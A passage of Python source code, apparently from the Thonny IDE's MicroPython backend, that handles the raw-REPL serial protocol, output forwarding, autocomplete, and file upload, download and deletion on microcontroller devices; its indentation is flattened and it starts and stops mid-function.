response = create_error_response(error="Interrupted", interrupted=True)
except ProtocolError as e:
self._send_output(
"THONNY FAILED TO EXECUTE %s (%s)\n" % (cmd.name, e.message), "stderr"
)
self._send_output("CAPTURED DATA: %r\n" % e.captured, "stderr")
self._send_output("TRYING TO RECOVER ...\n", "stderr")
# TODO: detect when there is no output for long time and suggest interrupt
self._forward_output_until_active_prompt("stdout")
response = create_error_response(error=e.message)
except Exception:
_report_internal_error()
response = create_error_response(context_info="other unhandled exception")
if response is None:
response = {}
if response is False:
# Command doesn't want to send any response
return
elif isinstance(response, dict):
if isinstance(cmd, ToplevelCommand):
response = ToplevelResponse(command_name=cmd.name, **response)
elif isinstance(cmd, InlineCommand):
response = InlineResponse(cmd.name, **response)
if "id" in cmd and "command_id" not in response:
response["command_id"] = cmd["id"]
debug("cmd: " + str(cmd) + ", respin: " + str(response))
self.send_message(response)
def _submit_input(self, cdata: str) -> None:
# TODO: what if there is a previous unused data waiting
assert self._connection.outgoing_is_empty()
assert cdata.endswith("\n")
if not cdata.endswith("\r\n"):
# submission is done with CRLF
cdata = cdata[:-1] + "\r\n"
bdata = cdata.encode(ENCODING)
with self._writing_lock:
self._connection.write(bdata)
# Try to consume the echo
try:
echo = self._connection.read(len(bdata))
except queue.Empty:
# leave it.
logging.warning("Timeout when reading input echo")
return
if echo != bdata:
# because of autoreload? timing problems? interruption?
# Leave it.
logging.warning("Unexpected echo. Expected %s, got %s" % (bdata, echo))
self._connection.unread(echo)
def send_message(self, msg):
if "cwd" not in msg:
msg["cwd"] = self._cwd
sys.stdout.write(serialize_message(msg) + "\n")
sys.stdout.flush()
def _send_output(self, data, stream_name):
if not data:
return
if isinstance(data, bytes):
data = data.decode(ENCODING, errors="replace")
data = self._transform_output(data)
msg = BackendEvent(event_type="ProgramOutput", stream_name=stream_name, data=data)
self.send_message(msg)
def _send_error_message(self, msg):
self._send_output("\n" + msg + "\n", "stderr")
def _transform_output(self, data):
# Any keypress wouldn't work
return data.replace(
"Press any key to enter the REPL. Use CTRL-D to reload.",
"Press Ctrl-C to enter the REPL. Use CTRL-D to reload.",
)
def _ensure_raw_propmt(self):
# similar to _interrupt_to_raw_prompt, but assumes we are already in a prompt
self._forward_unexpected_output()
self._connection.write(RAW_MODE_CMD)
prompt = self._connection.read_until(FIRST_RAW_PROMPT_SUFFIX, 1, True)
if not prompt.endswith(FIRST_RAW_PROMPT_SUFFIX):
raise TimeoutError("Could not ensure raw prompt")
def _submit_code_to_raw_repl(self, script):
assert script # otherwise EOT produces soft reboot
self._ensure_raw_propmt()
# send command
with self._writing_lock:
self._connection.write(script.encode(ENCODING) + EOT)
debug("Wrote " + script + "\n--------\n")
# fetch command confirmation
confirmation = self._connection.soft_read(2, timeout=WAIT_OR_CRASH_TIMEOUT)
if confirmation != OK:
raise ProtocolError(
"Could not read command confirmation", confirmation + self._connection.read_all()
)
debug("GOTOK")
def _execute_in_raw_mode(self, script, timeout, capture_stdout):
"""Ensures raw prompt and submits the script.
Returns (out, value_repr, err) if there are no problems, ie. all parts of the
output are present and it reaches active raw prompt.
Otherwise raises ProtocolError.
Expected output after submitting the command and reading the confirmation is following:
- User code:
stdout
EOT
stderr
EOT
RAW_PROMPT
- Thonny management/evaluation commands:
stdout (rare, eg. produced by unorthodox __repr__ methods)
EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END
EOT
EOT
RAW_PROMPT
The execution may block. In this case the user should do something (eg. provide
required input or issue an interrupt). The UI should remind the interrupt in case
of Thonny commands.
"""
self._submit_code_to_raw_repl(script)
# The part until first EOT is supposed to be stdout output.
# If capture is not required then it is produced by user code,
# ie. the output produced should be forwarded as it appears.
if capture_stdout:
stdout_block = self._connection.soft_read_until(EOT, timeout=timeout)
if stdout_block.endswith(EOT):
out = stdout_block[: -len(EOT)]
else:
raise ProtocolError("Captured output was not terminated properly", stdout_block)
else:
out = b""
terminator = self._forward_output_until_eot_or_active_propmt()
if terminator != EOT:
raise ProtocolError("Incremental output was not terminated properly", terminator)
stdout_block = out + terminator
# Remaining part must contain value repr and empty stderr or (possibly empty) stderr alone.
# Value repr followed by non-empty stderr (eg. by cleanup code) is considered a protocol
# error. This part can be read as one block. It should appear quite quickly as the first
# EOT is already present.
final_terminator = EOT + RAW_PROMPT
value_err_block = self._connection.soft_read_until(final_terminator, WAIT_OR_CRASH_TIMEOUT)
if not value_err_block.endswith(final_terminator):
raise ProtocolError(
"Value/stderr was not terminated properly", stdout_block + value_err_block
)
trimmed_value_err_block = value_err_block[: -len(final_terminator)]
# trimmed_value_err_block may or may not contain value-repr block
if trimmed_value_err_block.count(EOT) == 0:
value_repr = None
err = trimmed_value_err_block
elif (
trimmed_value_err_block.count(EOT) == 1
and trimmed_value_err_block.startswith(VALUE_REPR_START)
and trimmed_value_err_block.endswith(VALUE_REPR_END + EOT)
):
value_repr = trimmed_value_err_block[
len(VALUE_REPR_START) : -len(VALUE_REPR_END + EOT)
].decode(ENCODING)
err = b""
else:
raise ProtocolError(
"Unexpected structure in value/stderr block", stdout_block + value_err_block
)
# The final condition -- the raw prompt we reached must be active prompt,
# ie. it must be the end of the output
remainder = self._connection.soft_read(1, timeout=0.01) + self._connection.read_all()
if remainder:
raise ProtocolError(
"Unexpected output after raw prompt", stdout_block + value_err_block + remainder
)
return out.decode(ENCODING), value_repr, err.decode(ENCODING)
def _execute_without_errors(self, script):
"""Meant for management tasks. stdout will be unexpected but tolerated.
stderr will cause exception"""
result = self._evaluate("True", prelude=script)
assert result is True
def _evaluate_to_repr(self, expr, prelude="", cleanup="", timeout=SECONDS_IN_YEAR):
"""Uses raw-REPL to evaluate and print the repr of given expression.
Side effects before printing the repr always get forwarded.
Returns the repr only if everything goes according to the plan.
Raises ProtocolError if anything looks fishy.
"""
script = ""
if prelude:
script += prelude + "\n"
script += "print(%r, repr(%s), sep='', end=%r)" % (
(EOT + VALUE_REPR_START).decode(),
expr,
VALUE_REPR_END.decode(),
)
if cleanup:
script += "\n" + cleanup
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=timeout, capture_stdout=False
)
assert not stdout
if value_repr is None:
raise ProtocolError("Could not find value repr", err)
elif err:
raise ProtocolError(
"Evaluated with errors",
EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
else:
return value_repr
def _execute_and_capture_output(self, script, timeout=5):
"""Executes script in raw repl, captures stdout and consumes terminators.
Returns stdout if everything goes well.
Raises ProtocolError if anything looks fishy.
"""
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=timeout, capture_stdout=True
)
if value_repr is not None:
raise ProtocolError(
"Unexpected value repr",
stdout + EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
elif err:
raise ProtocolError("Captured output with errors", stdout + EOT + err)
else:
return stdout
def _execute_user_code(self, script):
"""Executes the code in raw REPL and forwards output / err,
if all goes according to protocol. Raises ProtocolError othewise."""
stdout, value_repr, err = self._execute_in_raw_mode(
script, timeout=SECONDS_IN_YEAR, capture_stdout=False
)
if value_repr is not None:
raise ProtocolError(
"Unexpected value repr",
stdout + EOT + VALUE_REPR_START + value_repr + VALUE_REPR_END + EOT + err,
)
else:
self._send_output(stdout, "stdout")
self._send_output(err, "stderr")
def _evaluate(self, expr, prelude="", cleanup=""):
value_repr = self._evaluate_to_repr(expr, prelude, cleanup)
return ast.literal_eval(value_repr)
def _forward_output_until_active_prompt(self, stream_name="stdout"):
"""Used for finding initial prompt or forwarding problematic output
in case of parse errors"""
while True:
terminator = self._forward_output_until_eot_or_active_propmt(stream_name)
if terminator in (NORMAL_PROMPT, RAW_PROMPT, FIRST_RAW_PROMPT):
return terminator
else:
self._send_output(terminator, "stdout")
def _forward_output_until_eot_or_active_propmt(self, stream_name="stdout"):
"""Meant for incrementally forwarding stdout from user statements,
scripts and soft-reboots. Also used for forwarding side-effect output from
expression evaluations and for capturing help("modules") output.
In these cases it is expected to arrive to an EOT.
Also used for initial prompt searching or for recovering from a protocol error.
In this case it must work until active prompt.
The code may have been submitted in any of the REPL modes or
automatically via (soft-)reset.
NB! The processing may end in normal mode even if the command was started
in raw mode (eg. when user presses reset during processing in some devices)!
The processing may also end in FIRST_RAW_REPL, when it was started in
normal REPL and Ctrl+A was issued during processing (ie. before Ctrl+C in
this example):
6
7
8
9
10
Traceback (most recent call last):
File "main.py", line 5, in <module>
KeyboardInterrupt:
MicroPython v1.11-624-g210d05328 on 2019-12-09; ESP32 module with ESP32
Type "help()" for more information.
>>>
raw REPL; CTRL-B to exit
>
(Preceding output does not contain EOT)
Note that this Ctrl+A may have been issued even before Thonny connected to
the device.
Note that interrupt does not affect the structure of the output -- it is
presented just like any other exception.
The method returns pair of captured output (or b"" if not requested)
and EOT, RAW_PROMPT or NORMAL_PROMPT, depending on which terminator ended the processing.
The terminating EOT may be either the first EOT from normal raw-REPL
output or the starting EOT from Thonny expression (or, in principle, even
the second raw-REPL EOT or terminating Thonny expression EOT)
-- the caller will do the interpretation.
Because ot the special role of EOT and NORMAL_PROMT, we assume user code
will not output these. If it does, processing will break.
TODO: Experiment with this!
Output produced by background threads (eg. in WiPy ESP32) cause even more difficulties,
because it becomes impossible to say whether we are at prompt and output
is from another thread or the main thread is still running.
For now I'm ignoring these problems and assume all output comes from the main thread.
"""
INCREMENTAL_OUTPUT_BLOCK_CLOSERS = re.compile(
b"|".join(map(re.escape, [LF, EOT, NORMAL_PROMPT, FIRST_RAW_PROMPT]))
)
pending = b""
while True:
# There may be an input submission waiting
# and we can't progress without resolving it first
self._check_for_side_commands()
# Prefer whole lines, but allow also incremental output to single line
# Note that here I'm not looking for non-first raw prompt, because this
# is always preceded by EOT.
new_data = self._connection.soft_read_until(
INCREMENTAL_OUTPUT_BLOCK_CLOSERS, timeout=0.05
)
if not new_data:
# In case we are still waiting for the first bits after connecting ...
if (
self._connection.num_bytes_received == 0
and not self._interrupt_suggestion_given
and time.time() - self._startup_time > 1.5
):
self._show_error(
"\n"
+ "Device is busy or does not respond. Your options:\n\n"
+ " - wait until it completes current work;\n"
+ " - use Ctrl+C to interrupt current work;\n"
+ " - use Stop/Restart to interrupt more and enter REPL.\n"
)
self._interrupt_suggestion_given = True
continue
pending += new_data
if pending.endswith(EOT):
self._send_output(pending[: -len(EOT)], stream_name)
return EOT
elif pending.endswith(LF):
self._send_output(pending, stream_name)
pending = b""
elif pending.endswith(NORMAL_PROMPT) or pending.endswith(FIRST_RAW_PROMPT):
# This looks like prompt (or its prefix).
# Make sure it is not followed by anything.
# Note that in this context the prompt means something is wrong
# (EOT would have been the happy path), so no need to hurry.
# The only case where this path is happy path is just after connecting.
follow_up = self._connection.soft_read(1, timeout=0.5)
if follow_up:
# Nope, the prompt is not active.
# (Actually it may be that a background thread has produced this follow up,
# but this would be too hard to consider.)
# Don't output yet, because the follow up may turn into another prompt
# and they can be captured all together.
pending += follow_up
else:
# let's hope it is an active prompt
if pending.endswith(NORMAL_PROMPT):
terminator = NORMAL_PROMPT
else:
terminator = FIRST_RAW_PROMPT
# Strip all trailing prompts
out = pending
while True:
if out.endswith(NORMAL_PROMPT):
out = out[: -len(NORMAL_PROMPT)]
elif out.endswith(FIRST_RAW_PROMPT):
out = out[: -len(FIRST_RAW_PROMPT)]
else:
break
self._send_output(out, stream_name)
return terminator
elif ends_overlap(pending, NORMAL_PROMPT) or ends_overlap(pending, FIRST_RAW_PROMPT):
# Maybe we have a prefix of the prompt and the rest is still coming?
follow_up = self._connection.soft_read(1, timeout=0.1)
if not follow_up:
# most likely not a Python prompt, let's forget about it
self._send_output(pending, stream_name)
pending = b""
else:
# Let's withhold this for now
pending += follow_up
else:
# No EOT or prompt in sight.
# Output and keep working.
self._send_output(pending, stream_name)
pending = b""
def _forward_unexpected_output(self, stream_name="stdout"):
"Invoked between commands"
data = self._connection.read_all()
at_prompt = False
while data.endswith(NORMAL_PROMPT) or data.endswith(FIRST_RAW_PROMPT):
# looks like the device was resetted
at_prompt = True
if data.endswith(NORMAL_PROMPT):
terminator = NORMAL_PROMPT
else:
terminator = FIRST_RAW_PROMPT
# hide the prompt from the output ...
data = data[: -len(terminator)]
self._send_output(data.decode(ENCODING, "replace"), stream_name)
if at_prompt:
# ... and recreate Thonny prompt
self.send_message(ToplevelResponse())
self._check_for_connection_errors()
def _clear_environment(self):
# TODO: Ctrl+D in raw repl is perfect for MicroPython
# but on CircuitPython it runs main.py
# TODO: which is better:
# self._execute_async(dedent("""
# for name in globals():
# if not name.startswith("__"):
# del globals()[name]
# """).strip())
# or
self._execute_without_errors("globals().clear(); __name__ = '__main__'")
def _check_for_side_commands(self):
# most likely the queue is empty
if self._command_queue.empty():
return
postponed = []
while not self._command_queue.empty():
cmd = self._command_queue.get()
if isinstance(cmd, InputSubmission):
self._submit_input(cmd.data)
elif isinstance(cmd, EOFCommand):
self._soft_reboot(True)
else:
postponed.append(cmd)
# put back postponed commands
while postponed:
self._command_queue.put(postponed.pop(0))
def _supports_directories(self):
# NB! make sure self._cwd is queried first
return bool(self._cwd)
def _connected_to_microbit(self):
return "micro:bit" in self._welcome_text.lower()
def _cmd_cd(self, cmd):
if len(cmd.args) == 1:
if not self._supports_directories():
raise UserError("This device doesn't have directories")
path = cmd.args[0]
self._execute_without_errors("import os as __thonny_os; __thonny_os.chdir(%r)" % path)
self._cwd = self._fetch_cwd()
return {}
else:
raise UserError("%cd takes one parameter")
def _cmd_Run(self, cmd):
# self._clear_environment()
assert cmd.get("source")
self._execute_user_code(cmd["source"])
return {}
def _cmd_execute_source(self, cmd):
try:
# Try to parse as expression
ast.parse(cmd.source, mode="eval")
# If it didn't fail then source is an expression
value_repr = self._evaluate_to_repr(cmd.source)
if value_repr is None:
value_repr = repr(None)
return {"value_info": ValueInfo(0, value_repr)}
except SyntaxError:
# source is a statement (or invalid syntax)
self._execute_user_code(cmd.source)
return {}
def _cmd_execute_system_command(self, cmd):
# Can't use stdin, because a thread is draining it
execute_system_command(cmd, cwd=self._local_cwd, disconnect_stdin=True)
def _cmd_get_globals(self, cmd):
if cmd.module_name == "__main__":
globs = self._evaluate(
"{name : repr(value) for (name, value) in globals().items() if not name.startswith('__')}"
)
else:
globs = self._evaluate(
"{name : repr(getattr(__mod_for_globs, name)) in dir(__mod_for_globs) if not name.startswith('__')}",
prelude="import %s as __mod_for_globs",
)
return {"module_name": cmd.module_name, "globals": globs}
def _cmd_get_dirs_child_data(self, cmd):
if self._supports_directories():
data = self._get_dirs_child_data_generic(cmd["paths"])
dir_separator = "/"
else:
assert cmd["paths"] == {""}, "Bad command: " + repr(cmd)
sizes = self._get_microbit_file_sizes()
root_data = {name: {"kind": "file", "size": size} for (name, size) in sizes.items()}
data = {"": root_data}
dir_separator = ""
return {"node_id": cmd["node_id"], "dir_separator": dir_separator, "data": data}
def _cmd_get_fs_info(self, cmd):
return self._get_fs_info(cmd.path)
def _cmd_write_file(self, cmd):
def generate_blocks(content_bytes, block_size):
for i in range(0, len(content_bytes), block_size):
yield content_bytes[i : i + block_size]
self._write_file(generate_blocks(cmd["content_bytes"], BUFFER_SIZE), cmd["path"])
return InlineResponse(
command_name="write_file", path=cmd["path"], editor_id=cmd.get("editor_id")
)
def _cmd_delete(self, cmd):
assert cmd.paths
paths = sorted(cmd.paths, key=lambda x: len(x), reverse=True)
try:
self._delete_via_serial(paths)
except Exception as e:
if "read-only" in str(e).lower():
self._delete_via_mount(paths)
self._sync_all_filesystems()
def _internal_path_to_mounted_path(self, path):
mount_path = self._get_fs_mount()
if mount_path is None:
return None
flash_prefix = self._get_flash_prefix()
if not path.startswith(flash_prefix):
return None
path_suffix = path[len(flash_prefix) :]
return os.path.join(mount_path, os.path.normpath(path_suffix))
def _cmd_read_file(self, cmd):
try:
content_bytes = b"".join(self._read_file(cmd["path"]))
error = None
except Exception as e:
_report_internal_error()
error = str(e)
content_bytes = None
return {"content_bytes": content_bytes, "path": cmd["path"], "error": error}
def _cmd_download(self, cmd):
total_size = 0
completed_files_size = 0
remote_files = self._list_remote_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"].rstrip("/").rstrip("\\")
download_items = []
for file in remote_files:
total_size += file["size"]
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = os.path.join(target_dir, os.path.normpath(path_suffix))
download_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in download_items]
existing_files = list(filter(os.path.exists, targets))
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in download_items:
written_bytes = self._download_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_upload(self, cmd):
completed_files_size = 0
local_files = self._list_local_files_with_info(cmd["source_paths"])
target_dir = cmd["target_dir"]
assert target_dir.startswith("/") or not self._supports_directories()
assert not target_dir.endswith("/") or target_dir == "/"
upload_items = []
for file in local_files:
# compute filenames (and subdirs) in target_dir
# relative to the context of the user selected items
assert file["path"].startswith(file["original_context"])
path_suffix = file["path"][len(file["original_context"]) :].strip("/").strip("\\")
target_path = self._join_remote_path_parts(target_dir, to_remote_path(path_suffix))
upload_items.append(dict(source=file["path"], target=target_path, size=file["size"]))
if not cmd["allow_overwrite"]:
targets = [item["target"] for item in upload_items]
existing_files = self._get_existing_remote_files(targets)
if existing_files:
return {
"existing_files": existing_files,
"source_paths": cmd["source_paths"],
"target_dir": cmd["target_dir"],
"description": cmd["description"],
}
total_size = sum([item["size"] for item in upload_items])
def notify(current_file_progress):
self._check_send_inline_progress(
cmd, completed_files_size + current_file_progress, total_size
)
# replace the indeterminate progressbar with determinate as soon as possible
notify(0)
for item in upload_items:
written_bytes = self._upload_file(item["source"], item["target"], notify)
assert written_bytes == item["size"]
completed_files_size += item["size"]
def _cmd_mkdir(self, cmd):
assert self._supports_directories()
assert cmd.path.startswith("/")
self._makedirs(cmd.path)
self._sync_all_filesystems()
def _cmd_editor_autocomplete(self, cmd):
# template for the response
result = dict(source=cmd.source, row=cmd.row, column=cmd.column)
try:
script = jedi.Script(cmd.source, cmd.row, cmd.column, sys_path=[self._api_stubs_path])
completions = script.completions()
result["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
result["error"] = "Autocomplete error"
return result
def _filter_completions(self, completions):
# filter out completions not applicable to MicroPython
result = []
for completion in completions:
if completion.name.startswith("__"):
continue
if completion.parent() and completion.full_name:
parent_name = completion.parent().name
name = completion.name
root = completion.full_name.split(".")[0]
# jedi proposes names from CPython builtins
if root in self._builtins_info and name not in self._builtins_info[root]:
continue
if parent_name == "builtins" and name not in self._builtins_info:
continue
result.append({"name": completion.name, "complete": completion.complete})
return result
def _cmd_shell_autocomplete(self, cmd):
source = cmd.source
# TODO: combine dynamic results and jedi results
if source.strip().startswith("import ") or source.strip().startswith("from "):
# this needs the power of jedi
response = {"source": cmd.source}
try:
# at the moment I'm assuming source is the code before cursor, not whole input
lines = source.split("\n")
script = jedi.Script(
source, len(lines), len(lines[-1]), sys_path=[self._api_stubs_path]
)
completions = script.completions()
response["completions"] = self._filter_completions(completions)
except Exception:
traceback.print_exc()
response["error"] = "Autocomplete error"
return response
else:
# use live data
match = re.search(
r"(\w+\.)*(\w+)?$", source
) # https://github.com/takluyver/ubit_kernel/blob/master/ubit_kernel/kernel.py
if match:
prefix = match.group()
if "." in prefix:
obj, prefix = prefix.rsplit(".", 1)
names = self._evaluate(
"dir({}) if '{}' in locals() or '{}' in globals() else []".format(
obj, obj, obj
)
)
else:
names = self._evaluate("dir()")
else:
names = []
prefix = ""
completions = []
# prevent TypeError (iterating over None)
names = names if names else []
for name in names:
if name.startswith(prefix) and not name.startswith("__"):
completions.append({"name": name, "complete": name[len(prefix) :]})
return {"completions": completions, "source": source}
def _cmd_dump_api_info(self, cmd):
"For use during development of the plug-in"
self._execute_without_errors(
dedent(
"""
def __get_object_atts(obj):
result = []
errors = []
for name in dir(obj):
try:
val = getattr(obj, name)
result.append((name, repr(val), repr(type(val))))
except BaseException as e:
errors.append("Couldn't get attr '%s' from object '%r', Err: %r" % (name, obj, e))
return (result, errors)
"""
)
)
for module_name in sorted(self._fetch_builtin_modules()):
if (
not module_name.startswith("_")
and not module_name.startswith("adafruit")
# and not module_name == "builtins"
):
file_name = os.path.join(
self._api_stubs_path, module_name.replace(".", "/") + ".py"
)
self._dump_module_stubs(module_name, file_name)
def _dump_module_stubs(self, module_name, file_name):
self._execute_without_errors("import {0}".format(module_name))
os.makedirs(os.path.dirname(file_name), exist_ok=True)
with io.open(file_name, "w", encoding="utf-8", newline="\n") as fp:
if module_name not in [
"webrepl",
"_webrepl",
"gc",
"http_client",
"http_client_ssl",
"http_server",
"framebuf",
"example_pub_button",
"flashbdev",
]:
self._dump_object_stubs(fp, module_name, "")
def _dump_object_stubs(self, fp, object_expr, indent):
if object_expr in [
"docs.conf",
"pulseio.PWMOut",
"adafruit_hid",
"upysh",
# "webrepl",
# "gc",
# "http_client",
# "http_server",
]:
print("SKIPPING problematic name:", object_expr)
return
print("DUMPING", indent, object_expr)
items, errors = self._evaluate("__get_object_atts({0})".format(object_expr))
if errors:
print("ERRORS", errors)
for name, rep, typ in sorted(items, key=lambda x: x[0]):
if name.startswith("__"):
continue
print("DUMPING", indent, object_expr, name)
self._send_text_to_shell(" * " + name + " : " + typ, "stdout")
if typ in ["<class 'function'>", "<class 'bound_method'>"]:
fp.write(indent + "def " + name + "():\n")
fp.write(indent + " pass\n\n")
elif typ in ["<class 'str'>", "<class 'int'>", "<class 'float'>"]:
fp.write(indent + name + " = " + rep + "\n")
elif typ == "<class 'type'>" and indent == "":
# full expansion only on toplevel
fp.write("\n")
fp.write(indent + "class " + name + ":\n") # What about superclass?
fp.write(indent + " ''\n")
self._dump_object_stubs(fp, "{0}.{1}".format(object_expr, name), indent + " ")
else:
# keep only the name
fp.write(indent + name + " = None\n")
def _read_file(self, path):
# TODO: read from mount when possible
# file_size = self._get_file_size(path)
block_size = 512
hex_mode = self.should_hexlify(path)
self._execute_without_errors("__thonny_fp = open(%r, 'rb')" % path)
if hex_mode:
self._execute_without_errors("from binascii import hexlify as __temp_hexlify")
while True:
if hex_mode:
block = binascii.unhexlify(
self._evaluate("__temp_hexlify(__thonny_fp.read(%s))" % block_size)
)
else:
block = self._evaluate("__thonny_fp.read(%s)" % block_size)
if block:
yield block
if len(block) < block_size:
break
self._execute_without_errors(
dedent(
"""
__thonny_fp.close()
del __thonny_fp
try:
del __temp_hexlify
except:
pass
"""
)
)
def _write_file(self, content_blocks, target_path, notifier=None):
try:
result = self._write_file_via_serial(content_blocks, target_path, notifier)
except ReadOnlyFilesystemError:
result = self._write_file_via_mount(content_blocks, target_path, notifier)
self._sync_all_filesystems()
return result
def _write_file_via_mount(self, content_blocks, target_path, notifier=None):
mounted_target_path = self._internal_path_to_mounted_path(target_path)
with open(mounted_target_path, "wb") as f:
bytes_written = 0
for block in content_blocks:
bytes_written += f.write(block)
f.flush()
os.fsync(f)
if notifier is not None:
notifier(bytes_written)
return bytes_written
def _write_file_via_serial(self, content_blocks, target_path, notifier=None):
# prelude
result = self._evaluate(
"__thonny_result",
dedent(
"""
try:
__thonny_path = '{path}'
__thonny_written = 0
__thonny_fp = open(__thonny_path, 'wb')
__thonny_result = "OK"
except Exception as e:
__thonny_result = str(e)
"""
).format(path=target_path),
)
if "readonly" in result.replace("-", "").lower():
raise ReadOnlyFilesystemError()
elif result != "OK":
raise RuntimeError("Problem opening file for writing: " + result)
# Define function to allow shorter write commands
hex_mode = self.should_hexlify(target_path)
if hex_mode:
self._execute_without_errors(
dedent(
"""
from binascii import unhexlify as __thonny_unhex
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(__thonny_unhex(x))
__thonny_fp.flush()
"""
)
)
else:
self._execute_without_errors(
dedent(
"""
def __W(x):
global __thonny_written
__thonny_written += __thonny_fp.write(x)
"""
)
)
bytes_sent = 0
for block in content_blocks:
if hex_mode:
script = "__W(%r)" % binascii.hexlify(block)
else:
script = "__W(%r)" % block
self._execute_without_errors(script)
print("Wrote", script)
bytes_sent += len(block)
if notifier is not None:
notifier(bytes_sent)
bytes_received = self._evaluate("__thonny_written")
if bytes_received != bytes_sent:
raise UserError("Expected %d written bytes but wrote %d" % (bytes_sent, bytes_received))
# clean up
self._execute_without_errors(
dedent(
"""
try:
del __W
del __thonny_written
del __thonny_path
__thonny_fp.close()
del __thonny_fp
del __thonny_result
del __thonny_unhex
except:
pass
"""
)
)
return bytes_sent
def _sync_all_filesystems(self):
self._execute_without_errors(
dedent(
"""
try:
from os import sync as __thonny_sync
__thonny_sync()
del __thonny_sync
except ImportError:
pass
"""
)
)
def _list_local_files_with_info(self, paths):
def rec_list_with_size(path):
result = {}
if os.path.isfile(path):
result[path] = os.path.getsize(path)
elif os.path.isdir(path):
for name in os.listdir(path):
result.update(rec_list_with_size(os.path.join(path, name)))
else:
raise RuntimeError("Can't process " + path)
return result
result = []
for requested_path in paths:
sizes = rec_list_with_size(requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
return result
def _list_remote_files_with_info(self, paths):
# prepare universal functions
self._execute_without_errors(
dedent(
"""
try:
import os as __thonny_os
from os import stat as __thonny_stat
def __thonny_getsize(path):
return __thonny_stat(path)[6]
def __thonny_isdir(path):
return __thonny_stat(path)[0] & 0o170000 == 0o040000
except ImportError:
__thonny_stat = None
# micro:bit
from os import size as __thonny_getsize
def __thonny_isdir(path):
return False
"""
)
)
self._execute_without_errors(
dedent(
"""
def __thonny_rec_list_with_size(path):
result = {}
if __thonny_isdir(path):
for name in __thonny_os.listdir(path):
result.update(__thonny_rec_list_with_size(path + "/" + name))
else:
result[path] = __thonny_getsize(path)
return result
"""
)
)
result = []
for requested_path in paths:
sizes = self._evaluate("__thonny_rec_list_with_size(%r)" % requested_path)
for path in sizes:
result.append(
{
"path": path,
"size": sizes[path],
"original_context": os.path.dirname(requested_path),
}
)
result.sort(key=lambda rec: rec["path"])
self._execute_without_errors(
dedent(
"""
del __thonny_os
del __thonny_stat
del __thonny_getsize
del __thonny_isdir
del __thonny_rec_list_with_size
"""
)
)
return result
def _get_existing_remote_files(self, paths):
if self._supports_directories():
func = "stat"
else:
func = "size"
return self._evaluate(
"__thonny_result",
prelude=dedent(
"""
import os as __thonny_os
__thonny_result = []
for __thonny_path in %r:
try:
__thonny_os.%s(__thonny_path)
__thonny_result.append(__thonny_path)
except OSError:
pass
"""
)
% (paths, func),
cleanup=dedent(
"""
del __thonny_os
del __thonny_result
del __thonny_path
"""
),
)
def _join_remote_path_parts(self, left, right):
if left == "": # micro:bit
assert not self._supports_directories()
return right.strip("/")
return left.rstrip("/") + "/" + right.strip("/")
def _get_file_size(self, path):
if self._supports_directories():
script = "__thonny_os.stat(%r)[6]"
else:
script = "os.stat(%r)[6]"
return self._evaluate(script % path, prelude="import os as __thonny_os")
def _makedirs(self, path):
if path == "/":
return
try:
self._makedirs_via_serial(path)
except Exception as e:
if "read-only" in str(e).lower():
self._makedirs_via_mount(path)
def _makedirs_via_mount(self, path):
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None, "Couldn't find mounted path for " + path
os.makedirs(mounted_path, exist_ok=True)
def _makedirs_via_serial(self, path):
if path == "/":
return
path = path.rstrip("/")
script = (
dedent(
"""
import os as __thonny_os
__thonny_parts = %r.split('/')
for i in range(2, len(__thonny_parts) + 1):
__thonny_path = "/".join(__thonny_parts[:i])
try:
__thonny_os.stat(__thonny_path)
except OSError:
# does not exist
__thonny_os.mkdir(__thonny_path)
del __thonny_parts
try:
del __thonny_path
except:
pass
"""
)
% path
)
self._execute_without_errors(script)
def _delete_via_mount(self, paths):
for path in paths:
mounted_path = self._internal_path_to_mounted_path(path)
assert mounted_path is not None
shutil.rmtree(mounted_path)
def _delete_via_serial(self, paths):
if not self._supports_directories():
self._execute_without_errors(
dedent(
"""
import os as __thonny_os
for __thonny_path in %r:
__thonny_os.remove(__thonny_path)
del __thonny_path
del __thonny_os
"""
)
% paths
)
else:
self._execute_without_errors(
dedent(
"""
import os as __thonny_os
def __thonny_delete(path):
if __thonny_os.stat(path)[0] & 0o170000 == 0o040000:
for name in __thonny_os.listdir(path):
child_path = path + "/" + name
__thonny_delete(child_path)
__thonny_os.rmdir(path)
else:
__thonny_os.remove(path)
for __thonny_path in %r:
__thonny_delete(__thonny_path)
del __thonny_path
del __thonny_delete
del __thonny_os
"""
)
% paths
)
def _upload_file(self, source, target, notifier):
assert target.startswith("/") or not self._supports_directories()
target_dir, _ = linux_dirname_basename(target)
assert target_dir.startswith("/") or not self._supports_directories()
self._makedirs(target_dir)
def block_generator():
with open(source, "rb") as source_fp:
while True:
block = source_fp.read(512)
if block:
yield block
else:
break
return self._write_file(block_generator(), target, notifier=notifier)
def _download_file(self, source, target, notifier=None):
os.makedirs(os.path.dirname(target), exist_ok=True)
bytes_written = 0
with open(target, "wb") as out_fp:
for block in self._read_file(source):
out_fp.write(block)
os.fsync(out_fp)
bytes_written += len(block)
notifier(bytes_written)
return bytes_written
def _get_fs_mount_label(self):
# This method is most likely required with CircuitPython,
# so try its approach first
# https://learn.adafruit.com/welcome-to-circuitpython/the-circuitpy-drive
result = self._evaluate(
"__thonny_result",
prelude=dedent(
"""
try:
from storage import getmount as __thonny_getmount
try:
